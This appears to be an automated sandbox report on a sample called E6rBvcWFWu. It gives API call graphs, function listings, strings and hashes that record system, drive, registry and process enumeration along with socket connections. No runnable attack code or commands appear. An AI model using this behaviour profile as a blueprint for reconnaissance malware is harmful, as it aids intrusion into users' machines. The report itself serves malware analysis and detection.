                                    execution_graph 87666 74507e4 87667 74507f1 Process32FirstW 87666->87667 87668 7450811 87667->87668 87515 68d5e0 87516 68d652 WSAStartup 87515->87516 87517 68d5f0 87515->87517 87516->87517 87669 6ab400 87670 6ab40b 87669->87670 87671 6ab425 87669->87671 87674 677770 87670->87674 87672 6ab421 87675 6777b6 recv 87674->87675 87676 677790 87674->87676 87677 677799 87675->87677 87676->87675 87676->87677 87677->87672 87678 6ae400 87679 6ae412 87678->87679 87681 6ae459 87678->87681 87682 6a68b0 socket ioctlsocket connect getsockname closesocket 87679->87682 87682->87681 87683 6ab3c0 87684 6ab3cb 87683->87684 87685 6ab3ee 87683->87685 87689 6776a0 87684->87689 87693 6a9290 87684->87693 87686 6ab3ea 87690 6776e6 send 87689->87690 87691 6776c0 87689->87691 87692 6776c9 87690->87692 87691->87690 87691->87692 87692->87686 87694 6776a0 send 87693->87694 87695 6a92e5 87694->87695 87696 6a9335 WSAIoctl 87695->87696 87699 6a9392 87695->87699 87697 6a9366 87696->87697 87696->87699 87698 6a9371 setsockopt 87697->87698 87697->87699 87698->87699 87699->87686 87700 74603aa 87701 74603ba Process32NextW 87700->87701 87703 74603e1 87701->87703 87704 672f17 87711 672f2c 87704->87711 87705 6731d3 87706 672fb3 RegOpenKeyExA 87706->87711 87707 67315c RegEnumKeyExA 87707->87711 87708 673046 RegOpenKeyExA 87709 673089 RegQueryValueExA 87708->87709 87708->87711 87710 67313b RegCloseKey 87709->87710 87709->87711 87710->87711 87711->87705 87711->87706 87711->87707 87711->87708 87711->87710 87712 6731d7 87713 6731f4 87712->87713 87714 673200 87713->87714 87715 6732dc CloseHandle 87713->87715 87715->87714 87518 681139 87519 681148 87518->87519 87521 681527 87519->87521 87522 680f69 87519->87522 87526 67fec0 6 API calls 87519->87526 87521->87522 87527 6822d0 6 API calls 87521->87527 87524 680f00 87522->87524 87528 6ad4d0 socket ioctlsocket connect getsockname closesocket 87522->87528 87526->87521 87527->87522 87528->87524 87529 724720 87533 724728 87529->87533 87530 724733 87532 724774 87533->87530 87540 72476c 87533->87540 87541 725540 socket ioctlsocket connect getsockname closesocket 87533->87541 87535 72482e 87535->87540 87542 729270 87535->87542 87537 724860 87547 724950 87537->87547 87539 724878 87540->87539 87555 7230a0 socket ioctlsocket connect getsockname closesocket 87540->87555 87541->87535 87556 72a440 87542->87556 87544 729297 87546 7292ab 87544->87546 87586 72bbe0 socket ioctlsocket connect getsockname closesocket 87544->87586 87546->87537 87548 724966 87547->87548 87552 7249c5 87548->87552 87554 7249b9 87548->87554 87588 72b590 if_nametoindex 87548->87588 87550 724a3e 87550->87552 87589 72bbe0 socket ioctlsocket connect getsockname closesocket 87550->87589 87551 724aa0 gethostname 87551->87552 87551->87554 87552->87540 87554->87551 87554->87552 87555->87532 87584 72a46b 87556->87584 87557 72a4db 87558 72aa03 RegOpenKeyExA 87557->87558 87571 72ad14 87557->87571 87559 72ab70 RegOpenKeyExA 87558->87559 87560 72aa27 RegQueryValueExA 87558->87560 87563 72ac34 RegOpenKeyExA 87559->87563 87581 72ab90 87559->87581 87561 72aa71 87560->87561 87562 72aacc RegQueryValueExA 87560->87562 87561->87562 87569 72aa85 RegQueryValueExA 87561->87569 87564 72ab66 RegCloseKey 87562->87564 87565 72ab0e 87562->87565 87566 72acf8 RegOpenKeyExA 87563->87566 87583 72ac54 87563->87583 87564->87559 87565->87564 87570 72ab1e RegQueryValueExA 87565->87570 87567 72ad56 RegEnumKeyExA 87566->87567 87566->87571 87568 72ad9b 87567->87568 87567->87571 87572 72ae16 RegOpenKeyExA 87568->87572 87573 72aab3 87569->87573 87576 72ab4c 87570->87576 87571->87544 87574 72ae34 RegQueryValueExA 87572->87574 87575 72addf RegEnumKeyExA 87572->87575 87573->87562 87577 72af43 RegQueryValueExA 87574->87577 87585 72adaa 87574->87585 87575->87571 87575->87572 87576->87564 87578 72b052 RegQueryValueExA 87577->87578 87577->87585 87580 72adc7 RegCloseKey 87578->87580 87578->87585 87580->87575 87581->87563 87582 72afa0 RegQueryValueExA 87582->87585 87583->87566 87584->87557 87587 72b830 if_nametoindex 87584->87587 87585->87577 87585->87578 87585->87580 87585->87582 87586->87546 87587->87557 87588->87550 87589->87554 87716 723c00 87717 723c23 87716->87717 87719 723c0d 87716->87719 87717->87719 87720 73b180 87717->87720 87723 73b19b 87720->87723 87727 73b2e3 87720->87727 87724 73b2a9 getsockname 87723->87724 87726 73b020 closesocket 87723->87726 87723->87727 87728 73af30 87723->87728 87732 73b060 87723->87732 87737 73b020 87724->87737 87726->87723 87727->87719 87729 73af63 socket 87728->87729 87730 73af4c 87728->87730 87729->87723 87730->87729 87731 73af52 87730->87731 87731->87723 87736 73b080 87732->87736 87733 73b0b0 connect 87734 73b0bf WSAGetLastError 87733->87734 87735 73b0ea 87734->87735 87734->87736 87735->87723 87736->87733 87736->87734 87736->87735 87738 73b052 87737->87738 87739 73b029 87737->87739 87738->87723 87740 73b04b closesocket 87739->87740 87741 73b03e 87739->87741 87740->87738 87741->87723 87742 73a080 87745 739740 87742->87745 87744 73a09b 87746 739780 87745->87746 87750 73975d 87745->87750 87747 739925 RegOpenKeyExA 87746->87747 87746->87750 87748 73995a RegQueryValueExA 87747->87748 87747->87750 87749 739986 RegCloseKey 87748->87749 87749->87750 87750->87744 87590 6729ff FindFirstFileA 87591 672a31 87590->87591 87592 672a5c RegOpenKeyExA 87591->87592 87593 672a93 87592->87593 87594 672ade CharUpperA 87593->87594 87595 672b0a 87594->87595 87596 672bf9 QueryFullProcessImageNameA 87595->87596 87597 672c3b CloseHandle 87596->87597 87599 672c64 87597->87599 87598 672df1 CloseHandle 87600 672e23 87598->87600 87599->87598 87751 673d5e 87752 673d30 87751->87752 87752->87751 87753 673d90 87752->87753 87757 680ab0 87752->87757 87760 67fcb0 6 API calls 87753->87760 87756 673dc1 87761 6805b0 87757->87761 87759 680acd 87759->87752 87760->87756 87762 6805bd 87761->87762 87767 6807c7 87761->87767 87763 680707 WSAEventSelect 87762->87763 87764 6807ef 87762->87764 87766 6776a0 send 87762->87766 87762->87767 87763->87762 87763->87767 87765 686fa0 select 87764->87765 87764->87767 87770 680847 87764->87770 87765->87770 87766->87762 87767->87759 87768 6809e8 WSAEnumNetworkEvents 87769 6809d0 WSAEventSelect 87768->87769 87768->87770 87769->87768 87769->87770 87770->87767 87770->87768 87770->87769 87601 6a95b0 87602 6a95c8 87601->87602 87603 6a95fd 87601->87603 87602->87603 87605 6aa150 87602->87605 87606 6aa15f 87605->87606 87608 6aa1d0 87605->87608 87607 6aa181 getsockname 87606->87607 87606->87608 87607->87608 87608->87603 87609 6a6ab0 87610 6a6ad5 87609->87610 87611 6a6bb4 87610->87611 87618 686fa0 87610->87618 87612 725ed0 7 API calls 87611->87612 87614 6a6ba9 87612->87614 87615 6a6b54 87615->87611 87615->87614 87616 6a6b5d 87615->87616 87616->87614 87622 725ed0 87616->87622 87619 686fd4 87618->87619 87621 686feb 87618->87621 87620 687207 select 87619->87620 87619->87621 87620->87621 87621->87615 87625 725a50 87622->87625 87624 725ee5 87624->87616 87626 725a58 87625->87626 87630 725ea0 87625->87630 87627 725b50 87626->87627 87633 725b88 87626->87633 87639 725a99 87626->87639 87631 725eb4 87627->87631 87632 725b7a 87627->87632 87627->87633 87628 725e96 87658 739480 socket ioctlsocket connect getsockname closesocket 87628->87658 87630->87624 87659 726f10 socket ioctlsocket connect getsockname closesocket 87631->87659 87648 7270a0 87632->87648 87637 725cae 87633->87637 87656 725ef0 socket ioctlsocket connect getsockname 87633->87656 87636 725ec2 87636->87636 87637->87628 87644 73a920 87637->87644 87657 739320 socket ioctlsocket connect getsockname closesocket 87637->87657 87639->87633 87642 7270a0 6 API calls 87639->87642 87655 726f10 socket ioctlsocket connect getsockname closesocket 87639->87655 87642->87639 87645 73a944 87644->87645 87646 73a94b 87645->87646 87647 73a977 send 87645->87647 87646->87637 87647->87637 87652 7270ae 87648->87652 87650 7271a7 87650->87633 87651 72717f 87651->87650 87665 739320 socket ioctlsocket connect getsockname closesocket 87651->87665 87652->87650 87652->87651 87660 73a8c0 87652->87660 87664 7271c0 socket ioctlsocket connect getsockname 87652->87664 87655->87639 87656->87633 87657->87637 87658->87630 87659->87636 87661 73a903 recvfrom 87660->87661 87662 73a8e6 87660->87662 87663 73a8ed 87661->87663 87662->87661 87662->87663 87663->87652 87664->87652 87665->87650 87771 67255d 87823 9f9f70 87771->87823 87773 67256c GetSystemInfo 87774 672589 87773->87774 87775 6725a0 GlobalMemoryStatusEx 87774->87775 87776 6725ec 87775->87776 87825 7420465 87776->87825 87829 74201eb 87776->87829 87833 74202e1 87776->87833 87837 7420324 87776->87837 87841 742029d 87776->87841 87845 74203a2 87776->87845 87849 7420159 87776->87849 87853 742035e 87776->87853 87857 74200da 87776->87857 87863 7420298 87776->87863 87867 7420190 87776->87867 87871 74201d1 87776->87871 87875 742010f 87776->87875 87881 7420210 87776->87881 87885 74200c4 87776->87885 87891 742000b 87776->87891 87897 7420046 87776->87897 87903 74203c4 87776->87903 87907 7420000 87776->87907 87913 7420201 87776->87913 87917 7420383 87776->87917 87921 7420183 87776->87921 87925 7420276 87776->87925 87929 742033f 87776->87929 87933 74202fe 87776->87933 87937 74200fe 87776->87937 87943 74203f8 87776->87943 87946 74202b8 87776->87946 87950 7420037 87776->87950 87956 74203bb 87776->87956 87960 7420068 87776->87960 87966 7420077 87776->87966 87972 74200ed 87776->87972 87978 7420132 87776->87978 87982 7420228 87776->87982 87986 74200ae 87776->87986 87992 74201a8 87776->87992 87824 9f9f7d 87823->87824 87824->87773 87824->87824 87826 742046b 87825->87826 87827 7420408 GetLogicalDrives 87825->87827 87826->87827 87828 7420449 87826->87828 87827->87828 87830 74201f6 GetLogicalDrives 87829->87830 87832 7420449 87830->87832 87834 74202f5 GetLogicalDrives 87833->87834 87836 7420449 87834->87836 87838 74202d1 GetLogicalDrives 87837->87838 87840 7420449 87838->87840 87842 74202a8 GetLogicalDrives 87841->87842 87844 7420449 87842->87844 87846 74203cf GetLogicalDrives 87845->87846 87848 7420449 87846->87848 87850 742015b GetLogicalDrives 87849->87850 87852 7420449 87850->87852 87854 742031f GetLogicalDrives 87853->87854 87856 7420449 87854->87856 87858 74200e3 87857->87858 87859 7420132 GetLogicalDrives 87858->87859 87860 7420124 GetLogicalDrives 87859->87860 87862 7420449 87860->87862 87864 74202a1 GetLogicalDrives 87863->87864 87866 7420449 87864->87866 87868 74201b0 GetLogicalDrives 87867->87868 87870 7420449 87868->87870 87872 74201f6 GetLogicalDrives 87871->87872 87874 7420449 87872->87874 87877 74200d8 87875->87877 87876 7420132 GetLogicalDrives 87878 7420124 GetLogicalDrives 87876->87878 87877->87876 87880 7420449 87878->87880 87882 7420238 GetLogicalDrives 87881->87882 87884 7420449 87882->87884 87886 74200c9 87885->87886 87887 7420132 GetLogicalDrives 87886->87887 87888 7420124 GetLogicalDrives 87887->87888 87890 7420449 87888->87890 87892 7420013 87891->87892 87893 7420132 GetLogicalDrives 87892->87893 87894 7420124 GetLogicalDrives 87893->87894 87896 7420449 87894->87896 87898 7420039 87897->87898 87899 7420132 GetLogicalDrives 87898->87899 87900 7420124 GetLogicalDrives 87899->87900 87902 7420449 87900->87902 87904 74203cf GetLogicalDrives 87903->87904 87906 7420449 87904->87906 87908 7420013 87907->87908 87909 7420132 GetLogicalDrives 87908->87909 87910 7420124 GetLogicalDrives 87909->87910 87912 7420449 87910->87912 87914 7420208 GetLogicalDrives 87913->87914 87916 7420449 87914->87916 87918 74203b4 GetLogicalDrives 87917->87918 87920 7420449 87918->87920 87922 7420189 GetLogicalDrives 87921->87922 87924 7420449 87922->87924 87926 74202a8 GetLogicalDrives 87925->87926 87928 7420449 87926->87928 87930 7420364 GetLogicalDrives 87929->87930 87932 7420449 87930->87932 87934 7420306 GetLogicalDrives 87933->87934 87936 7420449 87934->87936 87938 7420109 87937->87938 87939 7420132 GetLogicalDrives 87938->87939 87940 7420124 GetLogicalDrives 87939->87940 87942 7420449 87940->87942 87944 7420408 GetLogicalDrives 87943->87944 87945 7420449 87944->87945 87947 74202d1 GetLogicalDrives 87946->87947 87949 7420449 87947->87949 87951 7420039 87950->87951 87952 7420132 GetLogicalDrives 87951->87952 87953 7420124 GetLogicalDrives 87952->87953 87955 7420449 87953->87955 87957 74203c8 GetLogicalDrives 87956->87957 87959 7420449 87957->87959 87961 742006c 87960->87961 87962 7420132 GetLogicalDrives 87961->87962 87963 7420124 GetLogicalDrives 87962->87963 87965 7420449 87963->87965 87967 742008b 87966->87967 87968 7420132 GetLogicalDrives 87967->87968 87969 7420124 GetLogicalDrives 87968->87969 87971 7420449 87969->87971 87973 742008d 87972->87973 87974 7420132 GetLogicalDrives 87973->87974 87975 7420124 GetLogicalDrives 87974->87975 87977 7420449 87975->87977 87979 742015b GetLogicalDrives 87978->87979 87981 7420449 87979->87981 87983 74201e9 GetLogicalDrives 87982->87983 87985 7420449 87983->87985 87987 74200b7 87986->87987 87988 7420132 GetLogicalDrives 87987->87988 87989 7420124 GetLogicalDrives 87988->87989 87991 7420449 87989->87991 87993 74201b0 GetLogicalDrives 87992->87993 87995 7420449 87993->87995 87996 6a8b50 87997 6a8b6b 87996->87997 88015 6a8bb5 87996->88015 87998 6a8b8f 87997->87998 87999 6a8bf3 87997->87999 87997->88015 88031 686e40 select 87998->88031 88016 6aa550 87999->88016 88002 6a8bfc 88005 6a8c1f connect 88002->88005 88006 6a8c35 88002->88006 88013 6a8cb2 88002->88013 88002->88015 88003 6a8cd9 SleepEx getsockopt 88007 6a8d18 88003->88007 88004 6aa150 getsockname 88012 6a8dff 88004->88012 88005->88006 88010 6aa150 getsockname 88006->88010 88008 6a8d43 88007->88008 88007->88013 88011 6aa150 getsockname 88008->88011 88014 6a8ba1 88010->88014 88011->88015 88012->88015 88032 6778b0 closesocket 88012->88032 88013->88004 88013->88012 88013->88015 88014->88003 88014->88013 88014->88015 88017 6aa575 88016->88017 88020 6aa597 88017->88020 88034 6775e0 88017->88034 88019 6778b0 closesocket 88022 6aa713 88019->88022 88021 6aa811 setsockopt 88020->88021 88027 6aa83b 88020->88027 88030 6aa69b 88020->88030 88021->88027 88022->88002 88024 6aaf56 88025 6aaf5d 88024->88025 88024->88030 88025->88022 88026 6aa150 getsockname 88025->88026 88026->88022 88029 6aabe1 88027->88029 88027->88030 88040 6a6be0 8 API calls 88027->88040 88029->88030 88039 6d67e0 ioctlsocket 88029->88039 88030->88019 88030->88022 88031->88014 88033 6778c5 88032->88033 88033->88015 88035 677607 socket 88034->88035 88036 6775ef 88034->88036 88037 67762b 88035->88037 88036->88035 88038 677643 88036->88038 88037->88020 88038->88020 88039->88024 88040->88029

                                    Executed Functions

                                    Function 006AF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                    • API String ID: 0-1590685507
                                    • Opcode ID: 7b43b3d10edc3d9d0677f5f6e0b4b0798b8a504deaf6adeb6e0d014eab3d5377
                                    • Instruction ID: 1c5e3b4b59a988f6e2e04e5caaa26382a82728608f16fd87ac05ec5271272ad4
                                    • Opcode Fuzzy Hash: 7b43b3d10edc3d9d0677f5f6e0b4b0798b8a504deaf6adeb6e0d014eab3d5377
                                    • Instruction Fuzzy Hash: ECC2C371A043449FD724DF68C480BAABBE2BF85314F04866DEC999B352D771ED85CB82
                                    Function 0067255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 862 67255d-672614 call 9f9f70 GetSystemInfo call afed30 call afef20 GlobalMemoryStatusEx call afed30 call afef20 944 672619 call 7420383 862->944 945 672619 call 7420183 862->945 946 672619 call 7420000 862->946 947 672619 call 7420201 862->947 948 672619 call 7420046 862->948 949 672619 call 74203c4 862->949 950 672619 call 74200c4 862->950 951 672619 call 742000b 862->951 952 672619 call 742010f 862->952 953 672619 call 7420210 862->953 954 672619 call 7420190 862->954 955 672619 call 74201d1 862->955 956 672619 call 74200da 862->956 957 672619 call 7420298 862->957 958 672619 call 7420159 862->958 959 672619 call 742035e 862->959 960 672619 call 742029d 862->960 961 672619 call 74203a2 862->961 962 672619 call 74202e1 862->962 963 672619 call 7420324 862->963 964 672619 call 7420465 862->964 965 672619 call 74201eb 862->965 966 672619 call 7420228 862->966 967 672619 call 74201a8 862->967 968 672619 call 7420068 862->968 969 672619 call 74200ae 862->969 970 672619 call 74200ed 862->970 971 672619 call 7420132 862->971 972 672619 call 7420276 862->972 973 672619 call 7420077 862->973 974 672619 call 7420037 862->974 975 672619 call 74203bb 862->975 976 672619 call 74203f8 862->976 977 672619 call 74202b8 862->977 978 672619 call 74202fe 862->978 979 672619 call 74200fe 862->979 980 672619 call 742033f 862->980 873 67261b-672620 874 672626-672637 call afeb30 873->874 875 67277c-672904 call afed30 call afef20 KiUserCallbackDispatcher call afed30 call afef20 call afed30 call afef20 call 9f8e38 call 9f8be0 call 9f8bd0 FindFirstFileW 873->875 879 672754-67275c 874->879 922 672906-672926 FindNextFileW 875->922 923 672928-67292c 875->923 881 672762-672777 call afef20 879->881 882 67263c-67264f GetDriveTypeA 879->882 881->875 884 672655-672685 GetDiskFreeSpaceExA 882->884 885 672743-672751 call 9f8b98 882->885 884->885 888 67268b-67273e call afee00 call afee90 call afef20 call afec20 call afef20 call afec20 call afef20 call afd2a0 884->888 885->879 888->885 922->922 922->923 924 672932-67296f call afed30 call afef20 call 9f8e78 923->924 925 67292e 923->925 931 672974-672979 924->931 925->924 932 67297b-6729a4 call afed30 call afef20 931->932 933 6729a9-6729fe call 9fa290 call afed30 call afef20 931->933 932->933 944->873 945->873 946->873 947->873 948->873 949->873 950->873 951->873 952->873 953->873 954->873 955->873 956->873 957->873 958->873 959->873 960->873 961->873 962->873 963->873 964->873 965->873 966->873 967->873 968->873 969->873 970->873 971->873 972->873 973->873 974->873 975->873 976->873 977->873 978->873 979->873 980->873
                                    APIs
                                    • GetSystemInfo.KERNELBASE ref: 00672579
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 006725CC
                                    • GetDriveTypeA.KERNELBASE ref: 00672647
                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 0067267E
                                    • KiUserCallbackDispatcher.NTDLL ref: 006727E2
                                    • FindFirstFileW.KERNELBASE ref: 006728F8
                                    • FindNextFileW.KERNELBASE ref: 0067291F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                    • String ID: ;%g$@$`
                                    • API String ID: 3271271169-774896648
                                    • Opcode ID: 1432a0598cc889867f6b4a148dfaa04db0e6445c6a396dbaa52d31debe8cbc6a
                                    • Instruction ID: b68cf68d9031f09155f9caf66ea7dc4c1b68ad9d91c12f169e3cf2203e3ebf47
                                    • Opcode Fuzzy Hash: 1432a0598cc889867f6b4a148dfaa04db0e6445c6a396dbaa52d31debe8cbc6a
                                    • Instruction Fuzzy Hash: 83D1B2B49047099FCB00EFA8D5856AEBBF1BF48314F008969F998D7315E7349A84CF92
                                    Function 006729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1402 6729ff-672a2f FindFirstFileA 1403 672a31-672a36 1402->1403 1404 672a38 1402->1404 1405 672a3d-672a91 call afee90 call afef20 RegOpenKeyExA 1403->1405 1404->1405 1410 672a93-672a98 1405->1410 1411 672a9a 1405->1411 1412 672a9f-672b0c call afee90 call afef20 CharUpperA call 9f8da0 1410->1412 1411->1412 1420 672b15 1412->1420 1421 672b0e-672b13 1412->1421 1422 672b1a-672b92 call afee90 call afef20 call 9f8e80 call 9f8e70 1420->1422 1421->1422 1431 672b94-672ba3 1422->1431 1432 672bcc-672c66 QueryFullProcessImageNameA CloseHandle call 9f8da0 1422->1432 1435 672ba5-672bae 1431->1435 1436 672bb0-672bc0 call 9f8e68 1431->1436 1442 672c6f 1432->1442 1443 672c68-672c6d 1432->1443 1435->1432 1439 672bc5-672bca 1436->1439 1439->1431 1439->1432 1444 672c74-672ce9 call afee90 call afef20 call 9f8e80 call 9f8e70 1442->1444 1443->1444 1453 672dcf-672e1c call afee90 call afef20 CloseHandle 1444->1453 1454 672cef-672d49 call 9f8bb0 call 9f8da0 1444->1454 1463 672e23-672e2e 1453->1463 1467 672d4b-672d63 call 9f8da0 1454->1467 1468 672d99-672dad 1454->1468 1465 672e37 1463->1465 1466 672e30-672e35 1463->1466 1469 672e3c-672ed6 call afee90 call afef20 1465->1469 1466->1469 1467->1468 1474 672d65-672d7d call 9f8da0 1467->1474 1468->1453 1484 672eea 1469->1484 1485 672ed8-672ee1 1469->1485 1474->1468 1480 672d7f-672d97 call 9f8da0 1474->1480 1480->1468 1487 672daf-672dc9 call 9f8e68 1480->1487 1486 672eef-672f16 call afee90 call afef20 1484->1486 1485->1484 1488 672ee3-672ee8 1485->1488 1487->1453 1487->1454 1488->1486
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                    • String ID: 0
                                    • API String ID: 2406880114-4108050209
                                    • Opcode ID: 503d00cbe0aa4b979673624f0200b5490eb9b1103f16c2ca787314d36abe26fe
                                    • Instruction ID: 3d42a077d486d09fda3fa527bb569877ecc56ebc2b8339f8b06a74fcfc52004b
                                    • Opcode Fuzzy Hash: 503d00cbe0aa4b979673624f0200b5490eb9b1103f16c2ca787314d36abe26fe
                                    • Instruction Fuzzy Hash: 07E1F6B09143099FCB50EF78E9856AEBBF5AF44304F408869E998DB354E734DA84CF42
                                    Function 006805B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1548 6805b0-6805b7 1549 6805bd-6805d4 1548->1549 1550 6807ee 1548->1550 1551 6805da-6805e6 1549->1551 1552 6807e7-6807ed 1549->1552 1551->1552 1553 6805ec-6805f0 1551->1553 1552->1550 1554 6805f6-680620 call 687350 call 6770b0 1553->1554 1555 6807c7-6807cc 1553->1555 1560 68066a-68068c call 6adec0 1554->1560 1561 680622-680624 1554->1561 1555->1552 1566 680692-6806a0 1560->1566 1567 6807d6-6807e3 call 687380 1560->1567 1562 680630-680655 call 6770d0 call 6803c0 call 687450 1561->1562 1592 68065b-680668 call 6770e0 1562->1592 1593 6807ce 1562->1593 1569 6806a2-6806a4 1566->1569 1570 6806f4-6806f6 1566->1570 1567->1552 1573 6806b0-6806e4 call 6873b0 1569->1573 1575 6806fc-6806fe 1570->1575 1576 6807ef-68082b call 683000 1570->1576 1573->1567 1591 6806ea-6806ee 1573->1591 1581 68072c-680754 1575->1581 1589 680a2f-680a35 1576->1589 1590 680831-680837 1576->1590 1585 68075f-68078b 1581->1585 1586 680756-68075b 1581->1586 1604 680700-680703 1585->1604 1605 680791-680796 1585->1605 1587 68075d 1586->1587 1588 680707-680719 WSAEventSelect 1586->1588 1594 680723-680726 1587->1594 1588->1567 1601 68071f 1588->1601 1599 680a3c-680a52 1589->1599 1600 680a37-680a3a 1589->1600 1595 680839-68084c call 686fa0 1590->1595 1596 680861-68087e 1590->1596 1591->1573 1598 6806f0 1591->1598 1592->1560 1592->1562 1593->1567 1594->1576 1594->1581 1612 680a9c-680aa4 1595->1612 1613 680852 1595->1613 1615 680882-68088d 1596->1615 1598->1570 1599->1567 1606 680a58-680a81 call 682f10 1599->1606 1600->1599 